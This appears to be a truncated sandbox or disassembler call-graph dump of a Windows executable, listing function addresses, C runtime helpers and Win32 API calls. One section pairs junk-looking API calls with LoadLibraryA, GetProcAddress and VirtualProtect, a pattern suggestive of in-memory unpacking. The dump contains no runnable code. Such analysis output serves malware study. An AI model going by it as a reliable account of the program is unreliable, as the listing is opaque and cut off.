407a37 strtoxl 68 API calls 9211->9213 9211->9221 9212->9209 9214 414659 GetLastError 9213->9214 9214->9221 9217 407a37 strtoxl 68 API calls 9215->9217 9230 4145c7 9217->9230 9218 41451f HeapAlloc 9218->9223 9219 414574 HeapReAlloc 9219->9223 9220 4145cc GetLastError 9220->9221 9221->9190 9222 40b6f4 ___sbh_alloc_block 5 API calls 9222->9223 9223->9204 9223->9205 9223->9218 9223->9219 9223->9221 9223->9222 9224 4145df 9223->9224 9225 409935 __calloc_impl 6 API calls 9223->9225 9227 4145c2 9223->9227 9231 40af45 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 9223->9231 9232 414597 9223->9232 9224->9221 9226 407a37 strtoxl 68 API calls 9224->9226 9225->9223 9228 4145ec 9226->9228 9229 407a37 strtoxl 68 API calls 9227->9229 9228->9214 9228->9221 9229->9230 9230->9220 9230->9221 9231->9223 9235 40ae08 LeaveCriticalSection 9232->9235 9234 41459e 9234->9223 9235->9234 9239 40ae08 LeaveCriticalSection 9236->9239 9238 40990e 9238->9150 9239->9238 9241 404bc5 9240->9241 9242 404bcd GetComboBoxInfo SetLastError 9241->9242 9243 404c01 9241->9243 9242->9241 9345 404ba5 LocalAlloc 9243->9345 9245 404c26 9246 404c3d FindNextFileW 9245->9246 9247 404c58 7 API calls 9245->9247 9248 404cab 9245->9248 9246->9245 9247->9245 9249 404cfe 9248->9249 9251 404cbb GetUserDefaultLangID WritePrivateProfileStringA AddRefActCtx 9248->9251 9257 404cd2 9248->9257 9250 404d09 13 API calls 9249->9250 9253 404db1 9249->9253 9354 403ca0 9250->9354 9251->9257 9256 404dc6 LoadLibraryA 9253->9256 9258 404dd7 9253->9258 9255 404d9e FindResourceW DeleteVolumeMountPointA GetConsoleAliasesLengthA 9255->9253 9256->9253 9257->9248 9257->9249 9259 404ce1 MoveFileWithProgressA 9257->9259 9351 4045df 9257->9351 9261 404df5 9258->9261 9346 4046f6 LoadLibraryA GetProcAddress VirtualProtect 9258->9346 9259->9257 9347 4045b7 9261->9347 9263 404e0d GlobalFlags 9264 404e0b 9263->9264 9264->9263 9265 404e2a 9264->9265 9266 404e38 WritePrivateProfileSectionA GetConsoleAliasW SetConsoleCursorInfo GetProfileSectionA 9265->9266 9267 404e75 LoadLibraryA 9265->9267 9266->9265 9268 404ed2 GetLastError 9267->9268 9268->9268 9269 404edb 9268->9269 9270 404ee7 11 API calls 9269->9270 9271 404f58 9269->9271 9270->9271 9271->8690 9273 407010 ___BuildCatchObjectHelper 9272->9273 9274 40701e 9273->9274 9275 40703b _printf 9273->9275 9276 407a37 strtoxl 68 API calls 9274->9276 9359 40bce4 9275->9359 9277 407023 9276->9277 9278 4069c7 strtoxl 6 API calls 9277->9278 9281 407033 ___BuildCatchObjectHelper 9278->9281 9280 40704d _printf 9364 40bd81 9280->9364 9281->8681 9283 40705f _printf 9371 40bef7 9283->9371 9285 407077 _printf 9391 40be1d 9285->9391 9290 406fe3 9289->9290 9291 406fdb GetLastError 9289->9291 9292 406ff5 9290->9292 9293 407a5d __dosmaperr 68 API calls 9290->9293 9291->9290 9292->8686 9294 406fef 9293->9294 9294->8686 9296 405daf std::_String_base::_Xlen __EH_prolog 9295->9296 9781 40563f 9296->9781 9301 405a38 9302 405a43 std::_String_base::_Xlen 9301->9302 9303 4053e6 std::_String_base::_Xlen 68 API calls 9302->9303 9304 405a55 9303->9304 9951 40589a 9304->9951 9307 40629e 9308 4062ad 9307->9308 9311 4062bc 9308->9311 9964 4057d4 9308->9964 9311->8695 9314 4053e6 std::_String_base::_Xlen 68 API calls 9313->9314 9315 404fc8 9314->9315 9315->8698 9317 4062f0 __EH_prolog 9316->9317 9318 405879 std::_String_base::_Xlen 76 API calls 9317->9318 9319 40630d 9318->9319 9320 4057d4 6 API calls 9319->9320 9321 40631c 9320->9321 9322 405847 6 API calls 9321->9322 9323 40632c 9322->9323 10111 405f17 9323->10111 9326 405847 6 API calls 9327 406349 9326->9327 10122 406286 9327->10122 9330 405635 ctype 68 API calls 9331 404fe3 9330->9331 9331->8702 9333 40ac18 __calloc_impl 68 API calls 9332->9333 9334 406f15 9333->9334 9335 404ff8 9334->9335 9336 407a37 strtoxl 68 API calls 9334->9336 9339 406ee5 9335->9339 9337 406f28 9336->9337 9337->9335 9338 407a37 strtoxl 68 API calls 9337->9338 9338->9335 10147 40abed 9339->10147 9342 405fed 10241 405eba 9342->10241 9344 405ff5 9345->9245 9346->9258 9348 4045c2 9347->9348 9350 4045da 9347->9350 9348->9350 9355 4044b0 9348->9355 9350->9264 9352 4046c3 9351->9352 9353 4045f5 15 API calls 9351->9353 9352->9257 9353->9352 9354->9255 9356 4044ef 9355->9356 9357 40454e RequestWakeupLatency CreateSemaphoreA 9356->9357 9358 4045ab 9356->9358 9357->9356 9358->9348 9360 40bcf1 9359->9360 9361 40bd07 EnterCriticalSection 9359->9361 9362 40aee2 __lock 68 API calls 9360->9362 9361->9280 9363 40bcfa 9362->9363 9363->9280 9399 410b53 9364->9399 9368 40bd96 _printf 9369 40bde3 9368->9369 9370 41017a __malloc_crt 68 API calls 9368->9370 9369->9283 9370->9369 9414 407de5 9371->9414 9374 40bf62 9375 407a37 strtoxl 68 API calls 9374->9375 9377 40bf67 9375->9377 9376 410b53 __fileno 68 API calls 9389 40bfa3 __output_l __aulldvrm _strlen 9376->9389 9378 4069c7 strtoxl 6 API calls 9377->9378 9379 40bf79 9378->9379 9380 40730b __except_handler4 5 API calls 9379->9380 9381 40ca6c 9380->9381 9381->9285 9383 40be51 102 API calls __output_l 9383->9389 9384 406f3b ___free_lconv_num 68 API calls 9384->9389 9385 40be84 102 API calls _write_multi_char 9385->9389 9386 40beaa 102 API calls _write_string 9386->9389 9387 410e55 80 API calls __cftof 9387->9389 9388 41017a __malloc_crt 68 API calls 9388->9389 9389->9374 9389->9379 9389->9383 9389->9384 9389->9385 9389->9386 9389->9387 9389->9388 9390 4092c6 6 API calls __decode_pointer 9389->9390 9422 410e72 9389->9422 9390->9389 9392 40be28 9391->9392 9393 407088 9391->9393 9392->9393 9633 41095c 9392->9633 9395 4070a0 9393->9395 9396 4070a5 _printf 9395->9396 9775 40bd52 9396->9775 9398 4070b0 9398->9281 9400 410b62 9399->9400 9404 40bd90 9399->9404 9401 407a37 strtoxl 68 API calls 9400->9401 9402 410b67 9401->9402 9403 4069c7 strtoxl 6 API calls 9402->9403 9403->9404 9405 410aef 9404->9405 9406 410b0b 9405->9406 9407 410afc 9405->9407 9410 410b2f 9406->9410 9411 407a37 strtoxl 68 API calls 9406->9411 9408 407a37 strtoxl 68 API calls 9407->9408 9409 410b01 9408->9409 9409->9368 9410->9368 9412 410b1f 9411->9412 9413 4069c7 strtoxl 6 API calls 9412->9413 9413->9410 9415 407df8 9414->9415 9421 407e45 9414->9421 9425 409512 9415->9425 9418 407e25 9418->9421 9445 40df13 9418->9445 9421->9374 9421->9376 9421->9389 9423 407de5 _LocaleUpdate::_LocaleUpdate 78 API calls 9422->9423 9424 410e85 9423->9424 9424->9389 9426 409499 __getptd_noexit 68 API calls 9425->9426 9427 40951a 9426->9427 9428 40cb0f __amsg_exit 68 API calls 9427->9428 9429 407dfd 9427->9429 9428->9429 9429->9418 9430 40e67f 9429->9430 9431 40e68b ___BuildCatchObjectHelper 9430->9431 9432 409512 __getptd 68 API calls 9431->9432 9433 40e690 9432->9433 9434 40e6be 9433->9434 9435 40e6a2 9433->9435 9436 40aee2 __lock 68 API calls 9434->9436 9438 409512 __getptd 68 API calls 9435->9438 9437 40e6c5 9436->9437 9461 40e641 9437->9461 9440 40e6a7 9438->9440 9443 40e6b5 ___BuildCatchObjectHelper 9440->9443 9444 40cb0f __amsg_exit 68 API calls 9440->9444 9443->9418 9444->9443 9446 40df1f ___BuildCatchObjectHelper 9445->9446 9447 409512 __getptd 68 API calls 9446->9447 9448 40df24 9447->9448 9449 40aee2 __lock 68 API calls 9448->9449 9450 40df36 9448->9450 9451 40df54 9449->9451 9452 40df44 ___BuildCatchObjectHelper 9450->9452 9454 40cb0f __amsg_exit 68 API calls 9450->9454 9453 40df9d 9451->9453 9456 40df85 InterlockedIncrement 9451->9456 9457 40df6b InterlockedDecrement 9451->9457 9452->9421 9629 40dfae 9453->9629 9454->9452 9456->9453 9457->9456 9458 40df76 9457->9458 9458->9456 9459 406f3b ___free_lconv_num 68 API calls 9458->9459 9460 40df84 9459->9460 9460->9456 9462 40e645 9461->9462 9463 40e677 9461->9463 9462->9463 9464 40e519 ___addlocaleref 8 API calls 9462->9464 9469 40e6e9 9463->9469 9465 40e658 9464->9465 9465->9463 9472 40e5a8 9465->9472 9628 40ae08 LeaveCriticalSection 9469->9628 9471 40e6f0 9471->9440 9473 40e5b9 InterlockedDecrement 9472->9473 9474 40e63c 9472->9474 9475 40e5d1 9473->9475 9476 40e5ce InterlockedDecrement 9473->9476 9474->9463 9486 40e3d0 9474->9486 9477 40e5db InterlockedDecrement 9475->9477 9478 40e5de 9475->9478 9476->9475 9477->9478 9479 40e5e8 InterlockedDecrement 9478->9479 9480 40e5eb 9478->9480 9479->9480 9481 40e5f5 InterlockedDecrement 9480->9481 9483 40e5f8 9480->9483 9481->9483 9482 40e611 InterlockedDecrement 9482->9483 9483->9482 9484 40e62c InterlockedDecrement 9483->9484 9485 40e621 InterlockedDecrement 9483->9485 9484->9474 9485->9483 9487 40e454 9486->9487 9489 40e3e7 9486->9489 9488 40e4a1 9487->9488 9490 406f3b ___free_lconv_num 68 API calls 9487->9490 9501 40e4c8 9488->9501 9540 411a59 9488->9540 9489->9487 9496 406f3b ___free_lconv_num 68 API calls 9489->9496 9512 40e41b 9489->9512 9492 40e475 9490->9492 9494 406f3b ___free_lconv_num 68 API calls 9492->9494 9498 40e488 9494->9498 9495 406f3b ___free_lconv_num 68 API calls 9495->9501 9502 40e410 9496->9502 9497 40e50d 9503 406f3b ___free_lconv_num 68 API calls 9497->9503 9505 406f3b ___free_lconv_num 68 API calls 9498->9505 9499 406f3b ___free_lconv_num 68 API calls 9500 40e449 9499->9500 9507 406f3b ___free_lconv_num 68 API calls 9500->9507 9501->9497 9506 406f3b 68 API calls ___free_lconv_num 9501->9506 9516 411c33 9502->9516 9509 40e513 9503->9509 9504 406f3b ___free_lconv_num 68 API calls 9510 40e431 9504->9510 9511 40e496 9505->9511 9506->9501 9507->9487 9509->9463 9532 411bee 9510->9532 9514 406f3b ___free_lconv_num 68 API calls 9511->9514 9512->9504 9515 40e43c 9512->9515 9514->9488 9515->9499 9517 411c40 9516->9517 9531 411cbd 9516->9531 9519 411c51 9517->9519 9520 406f3b ___free_lconv_num 68 API calls 9517->9520 9518 411c63 9522 411c75 9518->9522 9523 406f3b ___free_lconv_num 68 API calls 9518->9523 9519->9518 9521 406f3b ___free_lconv_num 68 API calls 9519->9521 9520->9519 9521->9518 9524 411c87 9522->9524 9525 406f3b ___free_lconv_num 68 API calls 9522->9525 9523->9522 9526 411c99 9524->9526 9528 406f3b ___free_lconv_num 68 API calls 9524->9528 9525->9524 9527 411cab 9526->9527 9529 406f3b ___free_lconv_num 68 API calls 9526->9529 9530 406f3b ___free_lconv_num 68 API calls 9527->9530 9527->9531 9528->9526 9529->9527 9530->9531 9531->9512 9533 411bfb 9532->9533 9539 411c2f 9532->9539 9534 406f3b ___free_lconv_num 68 API calls 9533->9534 9535 411c0b 9533->9535 9534->9535 9536 411c1d 9535->9536 9537 406f3b ___free_lconv_num 68 API calls 9535->9537 9538 406f3b ___free_lconv_num 68 API calls 9536->9538 9536->9539 9537->9536 9538->9539 9539->9515 9541 40e4c1 9540->9541 9542 411a6a 9540->9542 9541->9495 9543 406f3b ___free_lconv_num 68 API calls 9542->9543 9544 411a72 9543->9544 9545 406f3b ___free_lconv_num 68 API calls 9544->9545 9546 411a7a 9545->9546 9547 406f3b ___free_lconv_num 68 API calls 9546->9547 9548 411a82 9547->9548 9549 406f3b ___free_lconv_num 68 API calls 9548->9549 9550 411a8a 9549->9550 9551 406f3b ___free_lconv_num 68 API calls 9550->9551 9552 411a92 9551->9552 9553 406f3b ___free_lconv_num 68 API calls 9552->9553 9554 411a9a 9553->9554 9555 406f3b ___free_lconv_num 68 API calls 9554->9555 9556 411aa1 9555->9556 9557 406f3b ___free_lconv_num 68 API calls 9556->9557 9558 411aa9 9557->9558 9559 406f3b ___free_lconv_num 68 API calls 9558->9559 9560 411ab1 9559->9560 9561 406f3b ___free_lconv_num 68 API calls 9560->9561 9562 411ab9 9561->9562 9563 406f3b ___free_lconv_num 68 API calls 9562->9563 9564 411ac1 9563->9564 9565 406f3b ___free_lconv_num 68 API calls 9564->9565 9566 411ac9 9565->9566 9567 406f3b ___free_lconv_num 68 API calls 9566->9567 9568 411ad1 9567->9568 9569 406f3b ___free_lconv_num 68 API calls 9568->9569 9570 411ad9 9569->9570 9571 406f3b ___free_lconv_num 68 API calls 9570->9571 9572 411ae1 9571->9572 9573 406f3b ___free_lconv_num 68 API calls 9572->9573 9574 411ae9 9573->9574 9575 406f3b ___free_lconv_num 68 API calls 9574->9575 9576 411af4 9575->9576 9577 406f3b ___free_lconv_num 68 API calls 9576->9577 9578 411afc 9577->9578 9579 406f3b ___free_lconv_num 68 API calls 9578->9579 9580 411b04 9579->9580 9581 406f3b ___free_lconv_num 68 API calls 9580->9581 9582 411b0c 9581->9582 9583 406f3b ___free_lconv_num 68 API calls 9582->9583 9584 411b14 9583->9584 9585 406f3b ___free_lconv_num 68 API calls 9584->9585 9586 411b1c 9585->9586 9587 406f3b ___free_lconv_num 68 API calls 9586->9587 9588 411b24 9587->9588 9589 406f3b ___free_lconv_num 68 API calls 9588->9589 9590 411b2c 9589->9590 9591 406f3b ___free_lconv_num 68 API calls 9590->9591 9592 411b34 9591->9592 9593 406f3b ___free_lconv_num 68 API calls 9592->9593 9594 411b3c 9593->9594 9595 406f3b ___free_lconv_num 68 API calls 9594->9595 9596 411b44 9595->9596 9597 406f3b ___free_lconv_num 68 API calls 9596->9597 9598 411b4c 9597->9598 9599 406f3b ___free_lconv_num 68 API calls 9598->9599 9600 411b54 9599->9600 9601 406f3b ___free_lconv_num 68 API calls 9600->9601 9602 411b5c 9601->9602 9603 406f3b ___free_lconv_num 68 API calls 9602->9603 9604 411b64 9603->9604 9605 406f3b ___free_lconv_num 68 API calls 9604->9605 9606 411b6c 9605->9606 9607 406f3b ___free_lconv_num 68 API calls 9606->9607 9608 411b7a 9607->9608 9609 406f3b ___free_lconv_num 68 API calls 9608->9609 9610 411b85 9609->9610 9611 406f3b ___free_lconv_num 68 API calls 9610->9611 9612 411b90 9611->9612 9613 406f3b ___free_lconv_num 68 API calls 9612->9613 9614 411b9b 9613->9614 9615 406f3b ___free_lconv_num 68 API calls 9614->9615 9616 411ba6 9615->9616 9617 406f3b ___free_lconv_num 68 API calls 9616->9617 9618 411bb1 9617->9618 9619 406f3b ___free_lconv_num 68 API calls 9618->9619 9620 411bbc 9619->9620 9621 406f3b ___free_lconv_num 68 API calls 9620->9621 9622 411bc7 9621->9622 9623 406f3b ___free_lconv_num 68 API calls 9622->9623 9624 411bd2 9623->9624 9625 406f3b ___free_lconv_num 68 API calls 9624->9625 9626 411bdd 9625->9626 9627 406f3b ___free_lconv_num 68 API calls 9626->9627 9627->9541 9628->9471 9632 40ae08 LeaveCriticalSection 9629->9632 9631 40dfb5 9631->9450 9632->9631 9634 410997 9633->9634 9635 410975 9633->9635 9634->9393 9635->9634 9636 410b53 __fileno 68 API calls 9635->9636 9637 410990 9636->9637 9639 414e94 9637->9639 9640 414ea0 ___BuildCatchObjectHelper 9639->9640 9641 414ec3 9640->9641 9642 414ea8 9640->9642 9644 414ed1 9641->9644 9647 414f12 9641->9647 9664 407a4a 9642->9664 9646 407a4a __close 68 API calls 9644->9646 9649 414ed6 9646->9649 9667 415af8 9647->9667 9648 407a37 strtoxl 68 API calls 9652 414eb5 ___BuildCatchObjectHelper 9648->9652 9650 407a37 strtoxl 68 API calls 9649->9650 9653 414edd 9650->9653 9652->9634 9655 4069c7 strtoxl 6 API calls 9653->9655 9654 414f18 9656 414f25 9654->9656 9657 414f3b 9654->9657 9655->9652 9677 414761 9656->9677 9659 407a37 strtoxl 68 API calls 9657->9659 9661 414f40 9659->9661 9660 414f33 9736 414f66 9660->9736 9662 407a4a __close 68 API calls 9661->9662 9662->9660 9665 409499 __getptd_noexit 68 API calls 9664->9665 9666 407a4f 9665->9666 9666->9648 9668 415b04 ___BuildCatchObjectHelper 9667->9668 9669 415b5f 9668->9669 9670 40aee2 __lock 68 API calls 9668->9670 9671 415b81 ___BuildCatchObjectHelper 9669->9671 9672 415b64 EnterCriticalSection 9669->9672 9673 415b30 9670->9673 9671->9654 9672->9671 9674 415b47 9673->9674 9675 410704 ___lock_fhandle InitializeCriticalSectionAndSpinCount 9673->9675 9739 415b8f 9674->9739 9675->9674 9678 414770 __write_nolock 9677->9678 9679 4147a2 9678->9679 9680 4147c9 9678->9680 9710 414797 9678->9710 9682 407a4a __close 68 API calls 9679->9682 9683 414831 9680->9683 9684 41480b 9680->9684 9681 40730b __except_handler4 5 API calls 9685 414e92 9681->9685 9686 4147a7 9682->9686 9688 414845 9683->9688 9743 415051 9683->9743 9687 407a4a __close 68 API calls 9684->9687 9685->9660 9689 407a37 strtoxl 68 API calls 9686->9689 9690 414810 9687->9690 9693 410aef __stbuf 68 API calls 9688->9693 9692 4147ae 9689->9692 9695 407a37 strtoxl 68 API calls 9690->9695 9696 4069c7 strtoxl 6 API calls 9692->9696 9694 414850 9693->9694 9697 414af6 9694->9697 9702 409512 __getptd 68 API calls 9694->9702 9698 414819 9695->9698 9696->9710 9700 414dc5 WriteFile 9697->9700 9701 414b06 9697->9701 9699 4069c7 strtoxl 6 API calls 9698->9699 9699->9710 9705 414ad8 9700->9705 9706 414df8 GetLastError 9700->9706 9703 414be4 9701->9703 9726 414b1a 9701->9726 9704 41486b GetConsoleMode 9702->9704 9725 414cc4 9703->9725 9728 414bf3 9703->9728 9704->9697 9708 414896 9704->9708 9707 414e43 9705->9707 9705->9710 9712 414e16 9705->9712 9706->9705 9707->9710 9711 407a37 strtoxl 68 API calls 9707->9711 9708->9697 9709 4148a8 GetConsoleCP 9708->9709 9709->9705 9734 4148cb 9709->9734 9710->9681 9714 414e66 9711->9714 9716 414e21 9712->9716 9717 414e35 9712->9717 9713 414b88 WriteFile 9713->9706 9713->9726 9722 407a4a __close 68 API calls 9714->9722 9715 414d2a WideCharToMultiByte 9715->9706 9719 414d61 WriteFile 9715->9719 9718 407a37 strtoxl 68 API calls 9716->9718 9756 407a5d 9717->9756 9723 414e26 9718->9723 9724 414d98 GetLastError 9719->9724 9719->9725 9720 414c68 WriteFile 9720->9706 9720->9728 9722->9710 9727 407a4a __close 68 API calls 9723->9727 9724->9725 9725->9705 9725->9707 9725->9715 9725->9719 9726->9705 9726->9707 9726->9713 9727->9710 9728->9705 9728->9707 9728->9720 9730 414977 WideCharToMultiByte 9730->9705 9732 4149a8 WriteFile 9730->9732 9731 4159b0 80 API calls __fassign 9731->9734 9732->9706 9732->9734 9733 4157d4 11 API calls __putwch_nolock 9733->9734 9734->9705 9734->9706 9734->9730 9734->9731 9734->9733 9735 4149fc WriteFile 9734->9735 9753 410eaa 9734->9753 9735->9706 9735->9734 9774 415b98 LeaveCriticalSection 9736->9774 9738 414f6e 9738->9652 9742 40ae08 LeaveCriticalSection 9739->9742 9741 415b96 9741->9669 9742->9741 9761 415a81 9743->9761 9745 41506f 9746 415077 9745->9746 9747 415088 SetFilePointer 9745->9747 9749 407a37 strtoxl 68 API calls 9746->9749 9748 4150a0 GetLastError 9747->9748 9751 41507c 9747->9751 9750 4150aa 9748->9750 9748->9751 9749->9751 9752 407a5d __dosmaperr 68 API calls 9750->9752 9751->9688 9752->9751 9754 410e72 __isleadbyte_l 78 API calls 9753->9754 9755 410eb9 9754->9755 9755->9734 9757 407a4a __close 68 API calls 9756->9757 9758 407a68 _realloc 9757->9758 9759 407a37 strtoxl 68 API calls 9758->9759 9760 407a7b 9759->9760 9760->9710 9762 415aa6 9761->9762 9763 415a8e 9761->9763 9766 407a4a __close 68 API calls 9762->9766 9771 415aeb 9762->9771 9764 407a4a __close 68 API calls 9763->9764 9765 415a93 9764->9765 9767 407a37 strtoxl 68 API calls 9765->9767 9768 415ad4 9766->9768 9769 415a9b 9767->9769 9770 407a37 strtoxl 68 API calls 9768->9770 9769->9745 9772 415adb 9770->9772 9771->9745 9773 4069c7 strtoxl 6 API calls 9772->9773 9773->9771 9774->9738 9776 40bd62 9775->9776 9777 40bd75 LeaveCriticalSection 9775->9777 9780 40ae08 LeaveCriticalSection 9776->9780 9777->9398 9779 40bd72 9779->9398 9780->9779 9782 405655 std::_String_base::_Xlen 9781->9782 9791 405493 9782->9791 9784 40565c 9785 405b8f 9784->9785 9786 405baa 9785->9786 9790 404fa7 9785->9790 9787 405bb8 9786->9787 9840 405a66 9786->9840 9848 405319 9787->9848 9790->9301 9794 405337 9791->9794 9793 4054a0 9793->9784 9797 4051eb 9794->9797 9798 40520a 9797->9798 9799 4051f8 9797->9799 9798->9799 9800 405216 9798->9800 9807 406a18 9799->9807 9819 403cb2 9800->9819 9806 40522e 9809 406a22 9807->9809 9808 40743a _malloc 68 API calls 9808->9809 9809->9808 9810 405205 9809->9810 9811 409935 __calloc_impl 6 API calls 9809->9811 9814 406a3e std::bad_alloc::bad_alloc 9809->9814 9810->9793 9811->9809 9812 406a64 9825 40526e 9812->9825 9814->9812 9816 40990f __cinit 75 API calls 9814->9816 9816->9812 9817 406a7d __CxxThrowException@8 RaiseException 9818 406a7c 9817->9818 9834 406467 9819->9834 9822 406a7d 9823 406ab2 RaiseException 9822->9823 9824 406aa6 9822->9824 9823->9806 9824->9823 9828 4064d7 9825->9828 9829 40527a 9828->9829 9830 4064f7 _strlen 9828->9830 9829->9817 9830->9829 9831 40743a _malloc 68 API calls 9830->9831 9832 40650a 9831->9832 9832->9829 9833 407383 _strcpy_s 68 API calls 9832->9833 9833->9829 9835 406480 _strlen 9834->9835 9839 403cbf 9834->9839 9836 40743a _malloc 68 API calls 9835->9836 9837 40648f 9836->9837 9838 407383 _strcpy_s 68 API calls 9837->9838 9837->9839 9838->9839 9839->9822 9841 405a70 __EH_prolog 9840->9841 9842 405a38 std::_String_base::_Xlen 76 API calls 9841->9842 9843 405a80 9842->9843 9851 4059f9 9843->9851 9846 406a7d __CxxThrowException@8 RaiseException 9847 405a9e 9846->9847 9941 4051a9 9848->9941 9854 4059bd 9851->9854 9855 4059c7 std::_String_base::_Xlen __EH_prolog 9854->9855 9858 405879 9855->9858 9863 4053e6 9858->9863 9860 405885 9867 40574e 9860->9867 9862 405894 9862->9846 9864 405410 std::_String_base::_Xlen 9863->9864 9865 4053f0 9863->9865 9864->9860 9865->9864 9880 405386 9865->9880 9868 40575e std::_String_base::_Xlen 9867->9868 9870 40576a std::_String_base::_Xlen 9868->9870 9887 406401 9868->9887 9871 405785 9870->9871 9872 40579b 9870->9872 9897 405434 9871->9897 9903 405663 9872->9903 9875 40578f 9877 405434 std::_String_base::_Xlen 76 API calls 9875->9877 9876 4057a3 std::_String_base::_Xlen 9878 405799 std::_String_base::_Xlen 9876->9878 9879 405386 std::_String_base::_Xlen 68 API calls 9876->9879 9877->9878 9878->9862 9879->9878 9881 40538f std::_String_base::_Xlen 9880->9881 9884 405286 9881->9884 9885 403d16 char_traits 68 API calls 9884->9885 9886 40529b 9885->9886 9886->9864 9888 40640d __EH_prolog3 9887->9888 9889 405a38 std::_String_base::_Xlen 76 API calls 9888->9889 9890 40641a 9889->9890 9912 40637a 9890->9912 9893 406a7d __CxxThrowException@8 RaiseException 9894 406438 9893->9894 9915 405a9f 9894->9915 9898 405442 9897->9898 9901 405447 std::_String_base::_Xlen 9897->9901 9899 406401 std::_String_base::_Xlen 76 API calls 9898->9899 9899->9901 9900 40547e std::_String_base::_Xlen 9900->9875 9901->9900 9921 4053aa 9901->9921 9904 40566c std::_String_base::_Xlen 9903->9904 9905 405679 9904->9905 9925 4063c9 9904->9925 9907 40567e 9905->9907 9910 40568b 9905->9910 9933 4054f0 9907->9933 9908 405689 std::_String_base::_Xlen 9908->9876 9910->9908 9911 4053e6 std::_String_base::_Xlen 68 API calls 9910->9911 9911->9908 9913 4059bd std::_String_base::_Xlen 76 API calls 9912->9913 9914 40638a 9913->9914 9914->9893 9916 405aa9 __EH_prolog 9915->9916 9917 4064d7 std::exception::exception 68 API calls 9916->9917 9918 405aba 9917->9918 9919 405879 std::_String_base::_Xlen 76 API calls 9918->9919 9920 405ad0 9919->9920 9920->9870 9922 4053b3 std::_String_base::_Xlen 9921->9922 9923 4052a8 std::_String_base::_Xlen 68 API calls 9922->9923 9924 4053ca 9923->9924 9924->9900 9926 4063d5 __EH_prolog3 9925->9926 9927 405a38 std::_String_base::_Xlen 76 API calls 9926->9927 9928 4063e2 9927->9928 9929 4059f9 std::_String_base::_Xlen 76 API calls 9928->9929 9930 4063f2 9929->9930 9931 406a7d __CxxThrowException@8 RaiseException 9930->9931 9932 406400 9931->9932 9934 4054fa std::_String_base::_Xlen __EH_prolog 9933->9934 9935 405378 std::_String_base::_Xlen 76 API calls 9934->9935 9938 405553 std::_String_base::_Xlen 9935->9938 9936 40559b 9937 4053e6 std::_String_base::_Xlen 68 API calls 9936->9937 9939 4055a6 std::_String_base::_Xlen 9937->9939 9938->9936 9940 405386 std::_String_base::_Xlen 68 API calls 9938->9940 9939->9908 9940->9936 9942 4051c6 9941->9942 9944 4051b6 9941->9944 9943 4051d2 9942->9943 9942->9944 9945 403cb2 std::_String_base::_Xlen 68 API calls 9943->9945 9946 406a18 std::_String_base::_Xlen 76 API calls 9944->9946 9947 4051dc 9945->9947 9948 4051c1 9946->9948 9949 406a7d __CxxThrowException@8 RaiseException 9947->9949 9948->9790 9950 4051ea 9949->9950 9952 4058a6 std::_String_base::_Xlen 9951->9952 9955 4057e8 9952->9955 9954 404fb4 9954->9307 9956 4057f8 std::_String_base::_Xlen 9955->9956 9957 405813 9956->9957 9958 4057fe std::_String_base::_Xlen 9956->9958 9959 405663 std::_String_base::_Xlen 76 API calls 9957->9959 9961 40574e std::_String_base::_Xlen 76 API calls 9958->9961 9962 40581d std::_String_base::_Xlen 9959->9962 9960 405811 std::_String_base::_Xlen 9960->9954 9961->9960 9962->9960 9963 405386 std::_String_base::_Xlen 68 API calls 9962->9963 9963->9960 9979 4056c5 9964->9979 9967 406229 9968 406237 9967->9968 9969 40623b 9968->9969 9989 405847 9968->9989 9996 405ffd 9969->9996 9975 405847 6 API calls 9976 406276 9975->9976 10025 4054c2 9976->10025 9982 4055dc 9979->9982 9981 4056d5 9981->9967 9983 4055e6 9982->9983 9985 405601 9983->9985 9986 4069ed 9983->9986 9985->9981 9987 4069c7 strtoxl 6 API calls 9986->9987 9988 4069f9 9987->9988 9988->9985 9990 4056c5 6 API calls 9989->9990 9991 405854 9990->9991 9992 4050b8 9991->9992 9993 4050c1 9992->9993 9994 4069ed 6 API calls 9993->9994 9995 4050da 9993->9995 9994->9995 9995->9969 9998 406007 __EH_prolog 9996->9998 9997 406218 9997->9975 9998->9997 9999 405a66 76 API calls 9998->9999 10002 406048 9998->10002 9999->10002 10000 4061c7 10004 405879 std::_String_base::_Xlen 76 API calls 10000->10004 10001 40613d 10003 405879 std::_String_base::_Xlen 76 API calls 10001->10003 10007 405319 76 API calls 10002->10007 10022 4060ca std::_String_base::_Xlen 10002->10022 10005 406145 10003->10005 10006 4061cf 10004->10006 10008 405f7a 76 API calls 10005->10008 10009 405f7a 76 API calls 10006->10009 10011 406077 10007->10011 10014 406163 10008->10014 10010 4061ee 10009->10010 10038 405f92 10010->10038 10028 405f7a 10011->10028 10034 405c62 10014->10034 10016 40608f 10020 405f7a 76 API calls 10016->10020 10018 405c62 76 API calls 10019 4061a0 10018->10019 10021 405635 ctype 68 API calls 10019->10021 10023 4060af 10020->10023 10021->9997 10022->9997 10022->10000 10022->10001 10023->10022 10031 405de5 10023->10031 10102 405345 10025->10102 10042 405e30 10028->10042 10075 405c37 10031->10075 10035 405c70 10034->10035 10090 405b5f 10035->10090 10039 405fa8 10038->10039 10094 405e74 10039->10094 10043 405e45 10042->10043 10046 405cf0 10043->10046 10047 405cfa __EH_prolog 10046->10047 10054 405614 10047->10054 10049 405d61 10051 405635 ctype 68 API calls 10049->10051 10050 405d11 10050->10049 10058 405b81 10050->10058 10052 405d69 10051->10052 10052->10016 10055 40561f std::_String_base::_Xlen 10054->10055 10056 4053e6 std::_String_base::_Xlen 68 API calls 10055->10056 10057 405631 10056->10057 10057->10050 10061 405923 10058->10061 10063 40592d __EH_prolog 10061->10063 10062 405946 10062->10050 10063->10062 10064 405879 std::_String_base::_Xlen 76 API calls 10063->10064 10065 40598e 10064->10065 10071 4058b7 10065->10071 10068 4058b7 76 API calls 10069 4059a5 10068->10069 10070 405635 ctype 68 API calls 10069->10070 10070->10062 10072 40585b 10071->10072 10073 40574e std::_String_base::_Xlen 76 API calls 10072->10073 10074 405868 10073->10074 10074->10068 10076 405c48 std::_String_base::_Xlen 10075->10076 10079 405b41 10076->10079 10080 405b48 10079->10080 10081 405b5b 10080->10081 10083 4058bc 10080->10083 10081->10022 10084 40586b 10083->10084 10087 4056f0 10084->10087 10086 405876 10086->10080 10088 405635 ctype 68 API calls 10087->10088 10089 4056f8 moneypunct 10088->10089 10089->10086 10091 405b66 10090->10091 10092 405b7a 10091->10092 10093 4058b7 76 API calls 10091->10093 10092->10019 10093->10091 10095 405e91 10094->10095 10098 405d7c 10095->10098 10099 405d88 10098->10099 10100 405d9f 10098->10100 10099->10100 10101 405b81 76 API calls 10099->10101 10100->10018 10101->10099 10105 